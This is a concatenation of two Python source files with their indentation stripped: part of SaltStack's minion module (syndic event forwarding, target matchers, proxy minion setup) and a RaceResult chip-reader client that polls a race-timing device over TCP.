if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
return
jdict = self.jids.setdefault(event['data']['jid'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if event['data']['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
self.jid_forward_cache.add(event['data']['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if 'master_id' in event['data']:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
@tornado.gen.coroutine
def _return_pub_multi(self, values):
for value in values:
yield self._return_pub(value,
'_syndic_return',
timeout=self._return_retry_timer(),
sync=False)
def _forward_events(self):
log.trace('Forwarding events') # pylint: disable=no-member
if self.raw_events:
events = self.raw_events
self.raw_events = []
self._fire_master(events=events,
pretag=tagify(self.opts['id'], base='syndic'),
sync=False)
if self.jids and (self.pub_future is None or self.pub_future.done()):
values = self.jids.values()
self.jids = {}
self.pub_future = self._return_pub_multi(values)
@tornado.gen.coroutine
def reconnect(self):
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
master, self.pub_channel = yield self.eval_master(opts=self.opts)
if self.connected:
self.opts['master'] = master
self.pub_channel.on_recv(self._process_cmd_socket)
log.info('Minion is ready to receive requests!')
raise tornado.gen.Return(self)
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local client's poller, so give it back before
# it's destroyed. Reset the local poller reference.
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
if hasattr(self, 'forward_events'):
self.forward_events.stop()
# TODO: consolidate syndic classes together?
# need a way of knowing if the syndic connection is busted
class MultiSyndic(MinionBase):
'''
Make a MultiSyndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
Modes (controlled by `syndic_mode`):
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and the return, the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and non-blocking
calls (with varying timeouts along the way), this daemon does not handle failure well;
under most circumstances it will stall for ~15s trying to forward events
to the down master.
'''
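# Illustrative master config for this daemon (option names come from the
# opts.get() calls in __init__ below; the values shown are assumptions):
#   syndic_mode: sync        # or 'cluster'
#   syndic_failover: random  # or 'ordered'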
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts, io_loop=None):
opts['loop_interval'] = 1
super(MultiSyndic, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self.syndic_failover = self.opts.get('syndic_failover', 'random')
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self._has_master = threading.Event()
self.jid_forward_cache = set()
if io_loop is None:
if HAS_ZMQ:
zmq.eventloop.ioloop.install()
self.io_loop = LOOP_CLASS.current()
else:
self.io_loop = io_loop
# List of events
self.raw_events = []
# Dict of rets: {master_id: {event_tag: job_ret, ...}, ...}
self.job_rets = {}
# List of delayed job_rets which could not be sent for some reason and will be resent to
# any available master
self.delayed = []
# Active pub futures: {master_id: (future, [job_ret, ...]), ...}
self.pub_futures = {}
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
self._syndics = OrderedDict() # mapping of opts['master'] -> syndic
for master in self.opts['master']:
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
'''
Create a syndic, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
while True:
log.debug('Syndic attempting to connect to {0}'.format(opts['master']))
try:
syndic = Syndic(opts,
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
io_loop=self.io_loop,
)
yield syndic.connect_master()
# set up the syndic to handle publishes (specifically not event forwarding)
syndic.tune_in_no_block()
log.info('Syndic successfully connected to {0}'.format(opts['master']))
break
except SaltClientError as exc:
log.error('Error while bringing up syndic for multi-syndic. Is master at {0} responding?'.format(opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except KeyboardInterrupt:
raise
except: # pylint: disable=W0702
log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)
raise tornado.gen.Return(syndic)
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
# if it's connected, mark it dead
if self._syndics[master].done():
syndic = self._syndics[master].result() # pylint: disable=no-member
self._syndics[master] = syndic.reconnect()
else:
log.info('Attempting to mark {0} as dead, although it is already marked dead'.format(master)) # TODO: debug?
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error('Unable to call {0} on {1}, that syndic is not connected'.format(func, master))
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
return
except SaltClientError:
log.error('Unable to call {0} on {1}, trying another...'.format(func, master))
self._mark_master_dead(master)
continue
log.critical('Unable to call {0} on any masters!'.format(func))
def _return_pub_syndic(self, values, master_id=None):
'''
Wrapper to call '_return_pub_multi' on a syndic, best effort to get the one you asked for
'''
func = '_return_pub_multi'
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error('Unable to call {0} on {1}, that syndic is not connected'.format(func, master))
continue
future, data = self.pub_futures.get(master, (None, None))
if future is not None:
if not future.done():
if master == master_id:
# Targeted master previous send not done yet, call again later
return False
else:
# Fallback master is busy, try the next one
continue
elif future.exception():
# Previous execution on this master returned an error
log.error('Unable to call {0} on {1}, trying another...'.format(func, master))
self._mark_master_dead(master)
del self.pub_futures[master]
# Add not sent data to the delayed list and try the next master
self.delayed.extend(data)
continue
future = getattr(syndic_future.result(), func)(values)
self.pub_futures[master] = (future, values)
return True
# Loop done and didn't exit: wasn't sent, try again later
return False
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
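# Usage sketch: _call_syndic and _return_pub_syndic above consume this as
#   for master, syndic_future in self.iter_master_options(master_id): ...
# preferring master_id when it is known and then falling back to the remaining masters.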
masters = list(self._syndics.keys())
if self.opts['syndic_failover'] == 'random':
shuffle(masters)
if master_id not in self._syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self._syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.job_rets = {}
self.raw_events = []
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
self._spawn_syndics()
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
self.local.event.subscribe('')
log.debug('MultiSyndic \'{0}\' trying to tune in'.format(self.opts['id']))
# register the event sub to the poller
self._reset_event_aggregation()
self.local.event.set_event_handler(self._process_event)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
self.io_loop.start()
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
event = {'data': data, 'tag': mtag}
log.trace('Got event {0}'.format(event['tag'])) # pylint: disable=no-member
tag_parts = event['tag'].split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
return
if self.syndic_mode == 'cluster' and event['data'].get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return received with matching master_id, not forwarding')
return
master = event['data'].get('master_id')
jdict = self.job_rets.setdefault(master, {}).setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if event['data']['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
self.jid_forward_cache.add(event['data']['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if master is not None:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = master
jdict[event['data']['id']] = event['data']['return']
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
# if we are the top level master, don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events') # pylint: disable=no-member
if self.raw_events:
events = self.raw_events
self.raw_events = []
self._call_syndic('_fire_master',
kwargs={'events': events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self.SYNDIC_EVENT_TIMEOUT,
'sync': False,
},
)
if self.delayed:
res = self._return_pub_syndic(self.delayed)
if res:
self.delayed = []
for master in list(six.iterkeys(self.job_rets)):
values = self.job_rets[master].values()
res = self._return_pub_syndic(values, master_id=master)
if res:
del self.job_rets[master]
class Matcher(object):
'''
Used to return the value for matching calls from the master
'''
def __init__(self, opts, functions=None):
self.opts = opts
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: {0}'.format(
matcher
))
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
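# e.g. (hypothetical id) a minion id of 'web01' matches a tgt of 'web*'.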
if not isinstance(tgt, six.string_types):
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, six.string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the grains glob match
'''
log.debug('grains target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter
)
def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt,
delimiter=delimiter, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
if self.functions is None:
utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=utils)
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter
)
def pillar_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar pcre match
'''
log.debug('pillar PCRE target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar PCRE match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter, regex_match=True
)
def pillar_exact_match(self, tgt, delimiter=':'):
'''
Reads in the pillar match, no globbing, no PCRE
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['pillar'],
tgt,
delimiter=delimiter,
exact_match=True)
def ipcidr_match(self, tgt):
'''
Matches based on IP address or CIDR notation
'''
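# e.g. (illustrative values) a tgt of '10.0.0.0/24' is parsed as a network and checked
# against the minion's ipv4 grains; '10.0.0.5' is treated as a single address.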
try:
# Target is an address?
tgt = ipaddress.ip_address(tgt)
except: # pylint: disable=bare-except
try:
# Target is a network?
tgt = ipaddress.ip_network(tgt)
except: # pylint: disable=bare-except
log.error('Invalid IP/CIDR target: {0}'.format(tgt))
return False
proto = 'ipv{0}'.format(tgt.version)
grains = self.opts['grains']
if proto not in grains:
match = False
elif isinstance(tgt, (ipaddress.IPv4Address, ipaddress.IPv6Address)):
match = str(tgt) in grains[proto]
else:
match = salt.utils.network.in_subnet(tgt, grains[proto])
return match
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: {0}'.format(exc))
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
if not isinstance(tgt, six.string_types) and not isinstance(tgt, (list, tuple)):
log.error('Compound target received that is neither string, list nor tuple')
return False
log.debug('compound_match: {0} ? {1}'.format(self.opts['id'], tgt))
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'J': 'pillar_pcre',
'L': 'list',
'N': None, # Nodegroups should already be expanded
'S': 'ipcidr',
'E': 'pcre'}
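# Illustrative compound target (hypothetical): 'web* and G@os:Debian or E@db[0-9]+'.
# Each letter prefix above selects a matcher, bare words fall back to glob_match,
# and the per-word boolean results are joined and eval()'d below.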
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
if isinstance(tgt, six.string_types):
words = tgt.split()
else:
words = tgt
for word in words:
target_info = salt.utils.minions.parse_target(word)
# Easy check first
if word in opers:
if results:
if results[-1] == '(' and word in ('and', 'or'):
log.error('Invalid beginning operator after "(": {0}'.format(word))
return False
if word == 'not':
if results[-1] not in ('and', 'or', '('):
results.append('and')
results.append(word)
else:
# seq start with binary oper, fail
if word not in ['(', 'not']:
log.error('Invalid beginning operator: {0}'.format(word))
return False
results.append(word)
elif target_info and target_info['engine']:
if 'N' == target_info['engine']:
# Nodegroups should already be expanded/resolved to other engines
log.error('Detected nodegroup expansion failure of "{0}"'.format(word))
return False
engine = ref.get(target_info['engine'])
if not engine:
# If an unknown engine is called at any time, fail out
log.error('Unrecognized target engine "{0}" for'
' target expression "{1}"'.format(
target_info['engine'],
word,
)
)
return False
engine_args = [target_info['pattern']]
engine_kwargs = {}
if target_info['delimiter']:
engine_kwargs['delimiter'] = target_info['delimiter']
results.append(
str(getattr(self, '{0}_match'.format(engine))(*engine_args, **engine_kwargs))
)
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(str(self.glob_match(word)))
results = ' '.join(results)
log.debug('compound_match {0} ? "{1}" => "{2}"'.format(self.opts['id'], tgt, results))
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
return False
return False
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
'''
log.debug("subclassed _post_master_init")
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
log.error('No proxy key found in pillar or opts for id '+self.opts['id']+'.')
log.error('Check your pillar configuration and contents. Salt-proxy aborted.')
self._running = False
raise SaltSystemExit(code=-1)
if 'proxy' not in self.opts:
self.opts['proxy'] = self.opts['pillar']['proxy']
fq_proxyname = self.opts['proxy']['proxytype']
# Need to load the modules so they get all the dunder variables
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# we can then sync any proxymodules down from the master
# we do a sync_all here in case proxy code was installed by
# SPM or was manually placed in /srv/salt/_modules etc.
self.functions['saltutil.sync_all'](saltenv='base')
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts)
# Check config 'add_proxymodule_to_opts'. Remove this in Carbon.
if self.opts['add_proxymodule_to_opts']:
self.opts['proxymodule'] = self.proxy
# And re-load the modules so the __proxy__ variable gets injected
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
self.proxy.pack['__pillar__'] = self.opts['pillar']
# Start engines here instead of in the Minion superclass __init__
# This is because we need to inject the __proxy__ variable but
# it is not setup until now.
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager, proxy=self.proxy)
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
log.error('Proxymodule {0} is missing an init() or a shutdown() or both.'.format(fq_proxyname))
log.error('Check your proxymodule. Salt-proxy aborted.')
self._running = False
raise SaltSystemExit(code=-1)
proxy_init_fn = self.proxy[fq_proxyname+'.init']
proxy_init_fn(self.opts)
self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy)
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0):
self.schedule.add_job({
'__master_alive_{0}'.format(self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
'__master_failback':
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job('__master_failback', persist=True)
else:
self.schedule.delete_job('__master_alive_{0}'.format(self.opts['master']), persist=True)
self.schedule.delete_job('__master_failback', persist=True)
# Sync the grains here so the proxy can communicate them to the master
self.functions['saltutil.sync_grains'](saltenv='base')
self.grains_cache = self.opts['grains']
|
RaceResult.py
|
import socket
import sys
import time
import datetime
import atexit
import subprocess
import threading
import re
import wx
import wx.lib.newevent
import Utils
import Model
from threading import Thread as Process
from queue import Queue, Empty
import JChip
from RaceResultImport import parseTagTime
from Utils import logCall, logException
ChipReaderEvent, EVT_CHIP_READER = JChip.ChipReaderEvent, JChip.EVT_CHIP_READER
readerEventWindow = None
def sendReaderEvent( tagTimes ):
if tagTimes and readerEventWindow:
wx.PostEvent( readerEventWindow, ChipReaderEvent(tagTimes = tagTimes) )
EOL = '\r\n' # RaceResult delimiter
len_EOL = len(EOL)
EOL_encode = EOL.encode()
DEFAULT_PORT = 3601
DEFAULT_HOST = '127.0.0.1' # Port to connect to the RaceResult receiver.
q = None
shutdownQ = None
listener = None
def socketSend( s, message ): # Accepts str or bytes; assumes the message is already delimited (if required).
if not isinstance(message, bytes):
message = message.encode()
sLen = 0
while sLen < len(message):
sLen += s.send( message[sLen:] )
def socketReadDelimited( s, delimiter=EOL_encode ):
if not isinstance(delimiter, bytes):
delimiter = delimiter.encode()
buffer = s.recv( 4096 )
while not buffer.endswith( delimiter ):
more = s.recv( 4096 )
if more:
buffer += more
else:
break
return buffer.decode() # returns a str.
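# Usage sketch (mirroring how AutoDetect and Server below use these helpers):
#   socketSend( s, 'GETSTATUS{}'.format(EOL) )
#   reply = socketReadDelimited( s )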
def AutoDetect( raceResultPort=3601, callback=None ):
''' Search ip addresses adjacent to the computer in an attempt to find the reader. '''
ip = [int(i) for i in Utils.GetDefaultHost().split('.')]
j = 0
for i in range(14):
j = -j if j > 0 else -j + 1
ipTest = list( ip )
ipTest[-1] += j
if not (0 <= ipTest[-1] < 256):
continue
raceResultHost = '.'.join( '{}'.format(v) for v in ipTest )
if callback:
if not callback( '{}:{}'.format(raceResultHost,raceResultPort) ):
return None
try:
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
s.settimeout( 0.5 )
s.connect( (raceResultHost, raceResultPort) )
except Exception as e:
continue
cmd = 'GETSTATUS'
try:
socketSend( s, '{}{}'.format(cmd, EOL) )
except Exception as e:
continue
try:
buffer = socketReadDelimited( s )
except Exception as e:
continue
try:
s.close()
except Exception as e:
pass
if buffer.startswith( '{};'.format(cmd) ):
return raceResultHost
return None
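# Example (hypothetical result): AutoDetect( callback=lambda m: True ) probes nearby
# addresses and returns the first responding reader host, e.g. '192.168.1.52',
# or None if nothing answers.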
# if we get the same time, make sure we give it a small offset to make it unique, but preserve the order.
tSmall = datetime.timedelta( seconds = 0.000001 )
statusFields = (
'Date', 'Time', 'HasPower', 'Antennas', 'IsInTimingMode', 'FileNumber', 'GPSHasFix',
)
reNonDigit = re.compile( '[^0-9]+' )
def Server( q, shutdownQ, HOST, PORT, startTime ):
global readerEventWindow
if not readerEventWindow:
readerEventWindow = Utils.mainWin
timeoutSecs = 5
delaySecs = 3
readerTime = None
readerComputerTimeDiff = None
s = None
passingsCur = 0
status = None
startOperation = None
def qLog( category, message ):
q.put( (category, message) )
Utils.writeLog( 'RaceResult: {}: {}'.format(category, message) )
def keepGoing():
try:
shutdownQ.get_nowait()
except Empty:
return True
return False
def autoDetectCallback( m ):
qLog( 'autodetect', '{} {}'.format(_('Checking'), m) )
return keepGoing()
def makeCall( s, message ):
cmd = message.split(';', 1)[0]
qLog( 'command', 'sending: {}'.format(message) )
try:
socketSend( s, '{}{}'.format(message,EOL) )
buffer = socketReadDelimited( s )
except Exception as e:
qLog( 'connection', '{}: {}: "{}"'.format(cmd, _('Connection failed'), e) )
raise ValueError
if not buffer.startswith( '{};'.format(cmd) ):
qLog( 'command', '{}: {} "{}"'.format(cmd, _('Unexpected return'), buffer) )
raise ValueError
return buffer
while keepGoing():
if s:
try:
s.shutdown( socket.SHUT_RDWR )
s.close()
except Exception as e:
pass
time.sleep( delaySecs )
#-----------------------------------------------------------------------------------------------------
qLog( 'connection', '{} {}:{}'.format(_('Attempting to connect to RaceResult reader at'), HOST, PORT) )
try:
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
s.settimeout( timeoutSecs )
s.connect( (HOST, PORT) )
except Exception as e:
qLog( 'connection', '{}: {}'.format(_('Connection to RaceResult reader failed'), e) )
s, status, startOperation = None, None, None
qLog( 'connection', '{}'.format(_('Attempting AutoDetect...')) )
HOST_AUTO = AutoDetect( callback = autoDetectCallback )
if HOST_AUTO:
qLog( 'connection', '{}: {}'.format(_('AutoDetect RaceResult at'), HOST_AUTO) )
HOST = HOST_AUTO
else:
time.sleep( delaySecs )
continue
#-----------------------------------------------------------------------------------------------------
crossMgrMinProtocol = (1,2)
crossMgrMinProtocolStr = '.'.join('{}'.format(p) for p in crossMgrMinProtocol)
try:
buffer = makeCall( s, 'GETPROTOCOL' )
except ValueError as e:
logException( e, sys.exc_info() )
continue
current, minSupported, maxSupported = [f.strip() for f in buffer.strip().split(';')[1:]]
if tuple(int(i) for i in maxSupported.split('.')) < crossMgrMinProtocol:
qLog(
'connection',
'{}. {} >={}. {} {}.'.format(
_("RaceResult requires Firmware Upgrade"),
_("CrossMgr requires PROTOCOL"), crossMgrMinProtocolStr,
_("RaceResult supports"), maxSupported,
)
)
time.sleep( delaySecs )
continue
try:
buffer = makeCall( s, 'SETPROTOCOL;{}'.format(maxSupported) )
except ValueError:
continue
qLog( 'status', '{}'.format(buffer.strip()) )
try:
buffer = makeCall( s, 'GETSTATUS' )
except ValueError:
continue
fields = [f.strip() for f in buffer.strip().split(';')]
status = zip( statusFields, fields[1:] )
for name, value in status:
qLog( 'status', '{}: {}'.format(name, value) )
#-----------------------------------------------------------------------------------------------------
try:
buffer = makeCall( s, 'STOPOPERATION' )
except ValueError:
continue
#-----------------------------------------------------------------------------------------------------
try:
buffer = makeCall( s, 'SETTIME;{}'.format(datetime.datetime.now().strftime('%Y-%m-%d;%H:%M:%S.%f')[:-3]) )
except ValueError:
continue
#-----------------------------------------------------------------------------------------------------
try:
buffer = makeCall( s, 'STARTOPERATION' )
except ValueError:
continue
qLog( 'status', '{}'.format(buffer.strip()) )
#-----------------------------------------------------------------------------------------------------
try:
buffer = makeCall( s, 'GETTIME' )
except ValueError:
continue
try:
dt = reNonDigit.sub(' ', buffer).strip()
fields = dt.split()
fields[-1] = (fields[-1] + '000000')[:6] # Pad with zeros to convert to microseconds.
readerTime = datetime.datetime( *[int(f) for f in fields] )
readerComputerTimeDiff = datetime.datetime.now() - readerTime
except Exception as e:
qLog( 'command', 'GETTIME: {} "{}" "{}"'.format(_('Unexpected return'), buffer, e) )
continue
while keepGoing():
#-------------------------------------------------------------------------------------------------
cmd = 'PASSINGS'
try:
socketSend( s, '{}{}'.format(cmd, EOL) )
buffer = socketReadDelimited( s )
if buffer.startswith( '{};'.format(cmd) ):
fields = buffer.split(';')
try:
passingsText = fields[1]
except Exception as e:
qLog( 'command', '{}: {} "{}" "{}"'.format(cmd, _('Unexpected return'), buffer, e) )
continue
try:
passingsNew = int( reNonDigit.sub(' ', passingsText).strip() )
except Exception as e:
qLog( 'command', '{}: {} "{}" "{}"'.format(cmd, _('Unexpected return'), buffer, e) )
continue
else:
qLog( 'command', '{}: {} "{}"'.format(cmd, _('Unexpected return'), buffer) )
continue
except Exception as e:
qLog( 'connection', '{}: {}: "{}"'.format(cmd, _('Connection failed'), e) )
break
if passingsNew != passingsCur:
if passingsNew < passingsCur:
passingsCur = 0
tagTimes = []
errors = []
times = set()
passingsCount = passingsNew - passingsCur
#---------------------------------------------------------------------------------------------
cmd = '{}:{}'.format(passingsCur+1, passingsCount) # Add one as the reader counts inclusively.
qLog( 'command', 'sending: {} ({}+{}={} passings)'.format(cmd, passingsCur, passingsCount, passingsNew) )
try:
# Get the passing data.
socketSend( s, '{}{}'.format(cmd, EOL) )
except Exception as e:
qLog( 'connection', 'cmd={}: {}: "{}"'.format(cmd, _('Connection failed'), e) )
break
tagReadSuccess = False
try:
readAllPassings = False
while not readAllPassings:
response = socketReadDelimited( s )
sStart = 0
while 1:
sEnd = response.find( EOL, sStart )
if sEnd < 0:
break
if sEnd == sStart: # An empty passing indicates this is the last one.
readAllPassings = True
break
line = response[sStart:sEnd]
sStart = sEnd + len_EOL
tag, t = parseTagTime(line, passingsCur+len(tagTimes), errors)
if tag is None or t is None:
qLog( 'command', '{}: {} "{}"'.format(cmd, _('Unexpected return'), line) )
continue
t += readerComputerTimeDiff
while t in times: # Ensure no equal times.
t += tSmall
times.add( t )
tagTimes.append( (tag, t) )
tagReadSuccess = True
except Exception as e:
qLog( 'connection', 'cmd={}: {}: "{}"'.format(cmd, _('Connection failed'), e) )
